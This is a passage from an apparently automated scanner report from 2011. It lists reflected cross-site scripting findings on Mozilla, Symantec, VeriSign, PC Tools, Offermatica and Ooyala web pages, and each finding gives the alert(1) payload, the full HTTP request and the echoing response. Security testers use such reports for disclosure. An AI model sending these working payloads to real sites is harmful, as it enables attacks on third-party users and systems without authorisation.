User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: WT_FPC=id=50.23.123.106-1186922976.30162294:lv=1315481521865:ss=1315481112751

Response

HTTP/1.0 404 Not Found
Server: Apache
Content-Type: text/html; charset=ISO-8859-1
Date: Fri, 09 Sep 2011 22:14:59 GMT
Connection: Keep-Alive
Set-Cookie: X-CheckNode=; domain=donate.mozilla.org; path=/
Content-Length: 391

<html>
<head>
<title>Error 404</title>
</head>
<body>
<h1>Sorry, File Not Found: 404</h1>
<p>Invalid URL /page1166c%3Cscript%3Ealert(document.location)%3C/script%3E98501cf3ded/contribute91fb8<script>alert(1)</script>7f56fd6704d/openwebfund</p>
...[SNIP]...

3.9. https://donate.mozilla.org/page1166c%3Cscript%3Ealert(document.location)%3C/script%3E98501cf3ded/contribute/openwebfund [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   https://donate.mozilla.org
Path:   /page1166c%3Cscript%3Ealert(document.location)%3C/script%3E98501cf3ded/contribute/openwebfund

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 63933<script>alert(1)</script>bf1b7d05258 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /page1166c%3Cscript%3Ealert(document.location)%3C/script%3E98501cf3ded/contribute/openwebfund63933<script>alert(1)</script>bf1b7d05258 HTTP/1.1
Host: donate.mozilla.org
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: WT_FPC=id=50.23.123.106-1186922976.30162294:lv=1315481521865:ss=1315481112751

Response

HTTP/1.0 404 Not Found
Server: Apache
Content-Type: text/html; charset=ISO-8859-1
Date: Fri, 09 Sep 2011 22:15:01 GMT
Connection: Keep-Alive
Set-Cookie: X-CheckNode=; domain=donate.mozilla.org; path=/
Content-Length: 391

<html>
<head>
<title>Error 404</title>
</head>
<body>
<h1>Sorry, File Not Found: 404</h1>
<p>Invalid URL /page1166c%3Cscript%3Ealert(document.location)%3C/script%3E98501cf3ded/contribute/openwebfund63933<script>alert(1)</script>bf1b7d05258</p>
...[SNIP]...

3.10. https://donate.mozilla.org/page1166c%3Cscript%3Ealert(document.location)%3C/script%3E98501cf3ded/contribute/openwebfund [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://donate.mozilla.org
Path:   /page1166c%3Cscript%3Ealert(document.location)%3C/script%3E98501cf3ded/contribute/openwebfund

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 48171<script>alert(1)</script>2ff872bc181 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /page1166c%3Cscript%3Ealert(document.location)%3C/script%3E98501cf3ded/contribute/openwebfund?48171<script>alert(1)</script>2ff872bc181=1 HTTP/1.1
Host: donate.mozilla.org
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: WT_FPC=id=50.23.123.106-1186922976.30162294:lv=1315481521865:ss=1315481112751

Response

HTTP/1.0 404 Not Found
Server: Apache
Content-Type: text/html; charset=ISO-8859-1
Date: Fri, 09 Sep 2011 22:14:56 GMT
Connection: Keep-Alive
Set-Cookie: X-CheckNode=; domain=donate.mozilla.org; path=/
Content-Length: 394

<html>
<head>
<title>Error 404</title>
</head>
<body>
<h1>Sorry, File Not Found: 404</h1>
<p>Invalid URL /page1166c%3Cscript%3Ealert(document.location)%3C/script%3E98501cf3ded/contribute/openwebfund?48171<script>alert(1)</script>2ff872bc181=1</p>
...[SNIP]...

3.11. https://fileconnect.symantec.com/licenselogin.jsp [localeStr parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   https://fileconnect.symantec.com
Path:   /licenselogin.jsp

Issue detail

The value of the localeStr request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ba9ab"%3b528b7643cdb was submitted in the localeStr parameter. This input was echoed as ba9ab";528b7643cdb in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /licenselogin.jsp?localeStr=en_USba9ab"%3b528b7643cdb HTTP/1.1
Host: fileconnect.symantec.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Fri, 09 Sep 2011 21:41:59 GMT
Content-length: 9332
Content-type: text/html;charset=UTF-8
Pragma: no-cache
Content-Language: en-US
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-store
Connection: close


<html>
<head>


<script language="JavaScript" src="javascript/common.js"></script>
<script language="JavaScript" src="javascript/calendar2.js"></script>
<
...[SNIP]...
and channel on the next lines. */

s.pageName    = "en/us: biz: FileConnect: Serial Number Input https://fileconnect.symantec.com/licenselogin.jsp?localeStr=en_US";    // set page name


s.prop2        = "USba9ab";528b7643cdb"    // set country
s.eVar27    = "USba9ab";528b7643cdb"

s.prop3        = "en"    // set language
s.eVar28    = "en"

s.prop27    = "Business";    // set Visitor Segment
s.eVar50    = "Business";
s.prop41    = "FileConne
...[SNIP]...

3.12. https://forms.verisign.com/websurveys/servlet/ActionMultiplexer [Action_ID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://forms.verisign.com
Path:   /websurveys/servlet/ActionMultiplexer

Issue detail

The value of the Action_ID request parameter is copied into the HTML document as plain text between tags. The payload 63579<script>alert(1)</script>6e92133b729 was submitted in the Action_ID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /websurveys/servlet/ActionMultiplexer?Action_ID=ACT200063579<script>alert(1)</script>6e92133b729&WSD_mode=3&WSD_surveyInfoID=943&toc=AAAAA-943-01-26&brand=01&country=26&oldToc=w29810323919638016&cid=47D9F8084F78B063 HTTP/1.1
Host: forms.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 80
Date: Fri, 09 Sep 2011 21:41:22 GMT

Missing or unknown action ID: ACT200063579<script>alert(1)</script>6e92133b729

3.13. http://free.pctools.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://free.pctools.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5e810"><script>alert(1)</script>d4356c76675 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /favicon.ico5e810"><script>alert(1)</script>d4356c76675 HTTP/1.1
Host: free.pctools.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: reftrack=freesite%2320110909170147; PHPSESSID=68o0726o7nflfg28ire9iju5j2; __utma=9079138.240734855.1315623957.1315623957.1315623957.1; __utmb=9079138.1.10.1315623957; __utmc=9079138; __utmz=9079138.1315623957.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __utma=1.1056361608.1315623957.1315623957.1315623957.1; __utmb=1.0.10.1315623957; __utmc=1; __utmz=1.1315623957.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response (redirected)

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.3.4
Content-Type: text/html; charset=UTF-8
Expires: Fri, 09 Sep 2011 22:05:59 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 09 Sep 2011 22:05:59 GMT
Content-Length: 8247
Connection: close
Vary: Accept-Encoding
Set-Cookie: reftrack=freesite%2320110909170147%7Cdeleted%2320110909170223; expires=Sat, 08-Sep-2012 21:02:24 GMT; path=/; domain=.pctools.com

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
   <title>Get PC Tools AntiVi
...[SNIP]...
<form method="POST" style="margin: 0; padding: 10px 16px 0 0;" action="/favicon.ico5e810"><script>alert(1)</script>d4356c76675/">
...[SNIP]...

3.14. http://free.pctools.com/free-antivirus/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://free.pctools.com
Path:   /free-antivirus/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36661"><script>alert(1)</script>55a70ea0c85 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /free-antivirus36661"><script>alert(1)</script>55a70ea0c85/ HTTP/1.1
Host: free.pctools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.3.4
Content-Type: text/html; charset=UTF-8
Expires: Fri, 09 Sep 2011 21:42:03 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 09 Sep 2011 21:42:03 GMT
Content-Length: 8274
Connection: close
Set-Cookie: reftrack=freesite%2320110909163826; expires=Sat, 08-Sep-2012 20:38:28 GMT; path=/; domain=.pctools.com

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
   <title>Get PC Tools AntiVi
...[SNIP]...
<form method="POST" style="margin: 0; padding: 10px 16px 0 0;" action="/free-antivirus36661"><script>alert(1)</script>55a70ea0c85/">
...[SNIP]...

3.15. http://free.pctools.com/free-antivirus/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://free.pctools.com
Path:   /free-antivirus/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7fde3"><script>alert(1)</script>f1a4218a279 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /free-antivirus/?7fde3"><script>alert(1)</script>f1a4218a279=1 HTTP/1.1
Host: free.pctools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.3.4
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 09 Sep 2011 21:42:02 GMT
Date: Fri, 09 Sep 2011 21:42:02 GMT
Content-Length: 17979
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
   <title>Free AntiVirus & An
...[SNIP]...
<form method="POST" style="margin: 0; padding: 10px 16px 0 0;" action="/free-antivirus/?7fde3"><script>alert(1)</script>f1a4218a279=1">
...[SNIP]...

3.16. https://idprotect.verisign.com/toolbar/activate.v [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://idprotect.verisign.com
Path:   /toolbar/activate.v

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 32d94'-alert(1)-'503da824579 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /toolbar/activate.v?32d94'-alert(1)-'503da824579=1 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: idprotect.verisign.com
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:47:52 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 7303
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
...[SNIP]...
<script type="text/javascript">
$(document).ready(function(){
$('#kaptchaRefresh').click(function(event) { $('#kaptchaImage').hide().attr('src', '/kaptcha.jpg?32d94'-alert(1)-'503da824579=1?' + Math.floor(Math.random()*100)).fadeIn(); });
$('#kaptchaImage').click(function (event) { $(this).hide().attr('src', '/kaptcha.jpg?32d94'-alert(1)-'503da824579=1?' + Math.floor(Math.random()
...[SNIP]...

3.17. https://idprotect.verisign.com/toolbar/activate.v [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://idprotect.verisign.com
Path:   /toolbar/activate.v

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3603"><script>alert(1)</script>2c6cb160cb7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /toolbar/activate.v?b3603"><script>alert(1)</script>2c6cb160cb7=1 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: idprotect.verisign.com
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:47:50 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 7348
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
...[SNIP]...
<img id="kaptchaImage" src="/kaptcha.jpg?b3603"><script>alert(1)</script>2c6cb160cb7=1" alt="Click for a different one!" title="Click for a different one!" />
...[SNIP]...

3.18. https://idprotect.verisign.com/toolbar/download.v [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://idprotect.verisign.com
Path:   /toolbar/download.v

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa418"><script>alert(1)</script>feea2f12a5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /toolbar/download.v?fa418"><script>alert(1)</script>feea2f12a5=1 HTTP/1.1
Host: idprotect.verisign.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://idprotect.verisign.com/toolbar/home.v
Cookie: JSESSIONID=B9C7C9F0BB0FA2EAFB424CDD517510A3.moped1be-d1-tc

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:47:52 GMT
Content-Type: text/html
Content-Length: 6622
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
...[SNIP]...
iv tabindex="0" style="cursor:pointer;padding-top:10px;" onkeydown="if ((event.which &amp;&amp; event.which == 13) || (event.keyCode &amp;&amp; event.keyCode == 13)) {location.href='/toolbar/install.v?fa418"><script>alert(1)</script>feea2f12a5=1'}" onclick="location.href='/toolbar/install.v?fa418">
...[SNIP]...

3.19. https://idprotect.verisign.com/toolbar/home.v [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://idprotect.verisign.com
Path:   /toolbar/home.v

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 141ab"><script>alert(1)</script>41143d22db1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /toolbar/home.v?141ab"><script>alert(1)</script>41143d22db1=1 HTTP/1.1
Host: idprotect.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:42:08 GMT
Content-Type: text/html
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
...[SNIP]...
<div tabindex="0" style="cursor:pointer;" onclick="location.href='/toolbar/download.v?141ab"><script>alert(1)</script>41143d22db1=1'" onkeydown="if ((event.which &amp;&amp; event.which == 13) || (event.keyCode &amp;&amp; event.keyCode == 13)) {location.href='/toolbar/download.v?141ab">
...[SNIP]...

3.20. https://idprotect.verisign.com/toolbar/install.v [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://idprotect.verisign.com
Path:   /toolbar/install.v

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e6ab"><script>alert(1)</script>b6843a60d67 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /toolbar/install.v?2e6ab"><script>alert(1)</script>b6843a60d67=1 HTTP/1.1
Host: idprotect.verisign.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://idprotect.verisign.com/toolbar/download.v
Cookie: JSESSIONID=B9C7C9F0BB0FA2EAFB424CDD517510A3.moped1be-d1-tc

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:47:52 GMT
Content-Type: text/html
Content-Length: 6866
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
...[SNIP]...
<a id="download" href="/toolbar/downloadIE.v?2e6ab"><script>alert(1)</script>b6843a60d67=1">
...[SNIP]...

3.21. http://mbox3.offermatica.com/m2/verisign/mbox/standard [mbox parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mbox3.offermatica.com
Path:   /m2/verisign/mbox/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 9179f<script>alert(1)</script>b30639e2275 was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/verisign/mbox/standard?mboxHost=www.verisign.com&mboxSession=1315621455064-973488&mboxPC=1315621455064-973488.19&mboxPage=1315621506825-922680&mboxXDomain=enabled&mboxCount=1&protocol=http%3A&serverDomain=www.verisign.com&referrer=none&mbox=VRSN_HP_AccBox_20119179f<script>alert(1)</script>b30639e2275&mboxId=0&mboxURL=http%3A//www.verisign.com/&mboxReferrer=&mboxVersion=31 HTTP/1.1
Host: mbox3.offermatica.com
Proxy-Connection: keep-alive
Referer: http://www.verisign.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mboxPC=1315621455064-973488.19

Response

HTTP/1.1 200 OK
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1315621455064-973488.19; Domain=offermatica.com; Expires=Sun, 09-Oct-2011 21:26:45 GMT; Path=/m2/verisign
Content-Type: text/javascript
Content-Length: 195
Date: Fri, 09 Sep 2011 21:26:45 GMT
Server: Test & Target

mboxFactoryDefault.get('VRSN_HP_AccBox_20119179f<script>alert(1)</script>b30639e2275',0).setOffer(new mboxOfferDefault()).loaded();mboxFactoryDefault.getPCId().forceId("1315621455064-973488.19");

3.22. http://player.ooyala.com/player.js [playerId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://player.ooyala.com
Path:   /player.js

Issue detail

The value of the playerId request parameter is copied into a JavaScript rest-of-line comment. The payload dbef4%0aalert(1)//8baddfff4b was submitted in the playerId parameter. This input was echoed as dbef4
alert(1)//8baddfff4b
in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /player.js?callback=receiveOoyalaEvent&playerId=ooyalaPlayer_44h86_g6tvkk69dbef4%0aalert(1)//8baddfff4b&width=488&height=335&embedCode=5rbzB2MTrK9lAvHdEslUi3qJGrQInV_c&wmode=transparent HTTP/1.1
Host: player.ooyala.com
Proxy-Connection: keep-alive
Referer: http://www.verisign.ch/corporate/index.html?tid=footer
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=131238736.759487282.1315547307.1315547307.1315547307.1; __utmz=131238736.1315547307.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:447-EQK-225&token:_mch-ooyala.com-1315547307468-28819

Response

HTTP/1.1 200 OK
Last-Modified: Fri, 09 Sep 2011 21:26:29 GMT
Content-Type: text/javascript; charset=utf-8
X-Ooyala-Server-Id: i-17d1a37b
X-Pad: avoid browser bug
Content-Length: 26426
Cache-Control: private, max-age=300
Date: Fri, 09 Sep 2011 21:26:30 GMT
Connection: close
Vary: Accept-Encoding

(function(){var f="9.0.115";var K="6.0.65";window.OOYALA_PLAYER_JS={};var j=(navigator.appVersion.indexOf("MSIE")!==-1)?true:false;var R=(navigator.appVersion.toLowerCase().indexOf("win")!==-1)?true:f
...[SNIP]...
"class":"OoyalaVideoPlayer",data:T};},getEmbedParams:function(T,i){return{allowScriptAccess:"always",allowFullScreen:"true",bgcolor:"#000000",wmode:T,flashvars:i};}};A.init("ooyalaPlayer_44h86_g6tvkk69dbef4
alert(1)//8baddfff4b
",a,d,"transparent","http://player.ooyala.com/static/cacheable/d2ac0151cf5faecb401182d187b5c9e8/player_v2.swf","http",o,F,m,j,B);}else{var N=e.createContainerDiv(q+"_InstallFlash",a,d,B);N.innerHTML='<
...[SNIP]...

3.23. http://player.ooyala.com/player.js [wmode parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://player.ooyala.com
Path:   /player.js

Issue detail

The value of the wmode request parameter is copied into a JavaScript rest-of-line comment. The payload 61651%0aalert(1)//96a754f882a was submitted in the wmode parameter. This input was echoed as 61651
alert(1)//96a754f882a
in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /player.js?width=356&height=224&embedCode=w0NmJhMTqAVBik2-mvMAlw7lBOLLrNpG&wmode=transparent61651%0aalert(1)//96a754f882a HTTP/1.1
Host: player.ooyala.com
Proxy-Connection: keep-alive
Referer: http://www.verisign.ch/trust-seal/index.html?tid=gnps
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=131238736.759487282.1315547307.1315547307.1315547307.1; __utmz=131238736.1315547307.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:447-EQK-225&token:_mch-ooyala.com-1315547307468-28819

Response

HTTP/1.1 200 OK
Last-Modified: Fri, 09 Sep 2011 21:26:35 GMT
Content-Type: text/javascript; charset=utf-8
X-Ooyala-Server-Id: i-fa51be9b
X-Pad: avoid browser bug
Content-Length: 26322
Cache-Control: private, max-age=300
Date: Fri, 09 Sep 2011 21:26:35 GMT
Connection: close
Vary: Accept-Encoding

(function(){var f="9.0.115";var K="6.0.65";window.OOYALA_PLAYER_JS={};var j=(navigator.appVersion.indexOf("MSIE")!==-1)?true:false;var R=(navigator.appVersion.toLowerCase().indexOf("win")!==-1)?true:f
...[SNIP]...
Player",data:T};},getEmbedParams:function(T,i){return{allowScriptAccess:"always",allowFullScreen:"true",bgcolor:"#000000",wmode:T,flashvars:i};}};A.init("ooyalaPlayer235820917_10kbk3k",a,d,"transparent61651
alert(1)//96a754f882a
","http://player.ooyala.com/static/cacheable/d2ac0151cf5faecb401182d187b5c9e8/player_v2.swf","http",o,F,m,j,B);}else{var N=e.createContainerDiv(q+"_InstallFlash",a,d,B);N.innerHTML='<table width="'+a+'
...[SNIP]...

3.24. https://press.verisign.com/easyir/customrel.do [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://press.verisign.com
Path:   /easyir/customrel.do

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 11807--><script>alert(1)</script>5053ee4c92a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /easyir/customrel.do?11807--><script>alert(1)</script>5053ee4c92a=1 HTTP/1.1
Host: press.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:42:38 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Servlet/3.0; JBossAS-6
Content-Length: 1328
Connection: close
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
